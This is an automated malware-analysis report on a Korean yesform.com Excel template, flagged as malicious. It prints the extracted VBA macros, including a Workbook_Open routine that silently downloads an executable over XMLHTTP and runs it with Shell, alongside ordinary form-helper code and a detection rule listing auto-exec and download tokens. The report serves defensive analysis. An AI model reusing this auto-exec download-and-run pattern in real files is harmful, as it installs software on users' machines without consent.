MALICIOUS
230
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.GenericHeuristic-5931846-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5931846-4
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://www.yesform.com/z_n/forms/search.php?q=In document text (OLE body)
- http://www.yesform.com/active/searchMessenger/dw.php?mode=etcIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7929 bytes |
SHA-256: 8905f8ff5040c289b256abb2f55d503d845ab73dc6bf19cc8a45889fba21ace9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
End If
End Sub
Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
Set FS = CreateObject("Scripting.FileSystemObject")
oXMLHTTP.Open "GET", SLocalFile, False
oXMLHTTP.Send
Do While oXMLHTTP.ReadyState <> 4
DoEvents
Loop
oResp = oXMLHTTP.ResponseBody
If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"
DFile = FreeFile
If Dir(DLocalFile) <> "" Then Kill DLocalFile
Open DLocalFile For Binary As #DFile
Put #DFile, , oResp
Close #DFile
Set oXMLHTTP = Nothing
Set FS = Nothing
End Function
Attribute VB_Name = "Module1"
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
Sub Move_Sheet1()
Sheet1.Activate
End Sub
Sub Move_Sheet2()
Sheet2.Activate
End Sub
Sub 시트보호()
Call Sheet_protect
MsgBox "시트보호모드로 전환되었습니다.", vbInformation, Banner
End Sub
Sub 시트해제()
Dim Result As Integer
Result = MsgBox("본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", vbYesNo, Banner)
If Result = vbYes Then
Call Sheet_unprotect
Else
Exit Sub
End If
End Sub
Sub P_preview()
ActiveSheet.PrintPreview
End Sub
Sub P_out()
ActiveSheet.PrintOut
End Sub
Sub Sheet_protect()
ActiveSheet.Protect Password = 1234, DrawingObjects:=True, Contents:=True, Scenarios:=True _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True, AllowInsertingHyperlinks:=True, AllowSorting:= _
True, AllowFiltering:=True
End Sub
Sub Sheet_unprotect()
ActiveSheet.Unprotect Password = 1234
End Sub
Sub P_preview_add()
Application.ScreenUpdating = False
If ActiveSheet.FilterMode = True Then
ActiveSheet.PrintPreview
Else
Call Sheet_unprotect
Selection.AutoFilter Field:=5, Criteria1:="<>"
ActiveSheet.PrintPreview
ActiveSheet.ShowAllData
Call Sheet_protect
End If
Application.ScreenUpdating = True
End Sub
Sub P_out_add()
Application.ScreenUpdating = False
If ActiveSheet.FilterMode = True Then
ActiveSheet.PrintOut
Else
Call Sheet_unprotect
Selection.AutoFilter Field:=5, Criteria1:="<>"
ActiveSheet.PrintOut
ActiveSheet.ShowAllData
Call Sheet_protect
End If
Application.ScreenUpdating = True
End Sub
Sub Search()
ThisWorkbook.FollowHyperlink Address:="http://www.yesform.com/z_n/forms/search.php?q=" & ActiveSheet.TextBox1, NewWindow:=False
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 38, 0, MSForms, TextBox"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 25, 0, MSForms, TextBox"
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub PicInsert()
Dim pic As Boolean
Sheet_unprotect
On Error Resume Next
Sheet2.Shapes(23).Delete
pic = Application.Dialogs(xlDialogInsertPicture).Show
If pic = True Then
Selection.Top = Range("b7").Top
Selection.Left = Range("b7").Left
Selection.Width = 88
Selection.Height = 115
Selection.ShapeRange.IncrementLeft 3.75
Selection.ShapeRange.IncrementTop 1.5
End If
Call Sheet_protect
End Sub
Sub DropC1()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop1").ListIndex + 1) * 3 + 2, 1), Sheet3.Cells((.DropDowns("drop1").ListIndex + 2) * 3, 1)).EntireRow.Copy
.Rows(15).Select
.Paste
Application.CutCopyMode = False
.[b15].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC2()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop2").ListIndex + 3) * 6 + 2, 1), Sheet3.Cells((.DropDowns("drop2").ListIndex + 4) * 6, 1)).EntireRow.Copy
.Rows(19).Select
.Paste
Application.CutCopyMode = False
.[b19].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC3()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop3").ListIndex + 9) * 6 - 1, 1), Sheet3.Cells((.DropDowns("drop3").ListIndex + 9) * 6 + 3, 1)).EntireRow.Copy
.Rows(26).Select
.Paste
Application.CutCopyMode = False
.[b26].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC4()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop4").ListIndex + 17) * 5 + 2, 1), Sheet3.Cells((.DropDowns("drop4").ListIndex + 18) * 5, 1)).EntireRow.Copy
.Rows(33).Select
.Paste
Application.CutCopyMode = False
.[b33].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC5()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop5").ListIndex + 19) * 6, 1), Sheet3.Cells((.DropDowns("drop5").ListIndex + 20) * 6 - 2, 1)).EntireRow.Copy
.Rows(39).Select
.Paste
Application.CutCopyMode = False
.[b39].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
Sub DropC6()
Application.ScreenUpdating = False
Sheet_unprotect
With ActiveSheet
Range(Sheet3.Cells((.DropDowns("drop6").ListIndex + 24) * 6 + 3, 1), Sheet3.Cells((.DropDowns("drop6").ListIndex + 25) * 6 + 1, 1)).EntireRow.Copy
.Rows(46).Select
.Paste
Application.CutCopyMode = False
.[b46].Select
End With
Call Sheet_protect
Application.ScreenUpdating = True
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.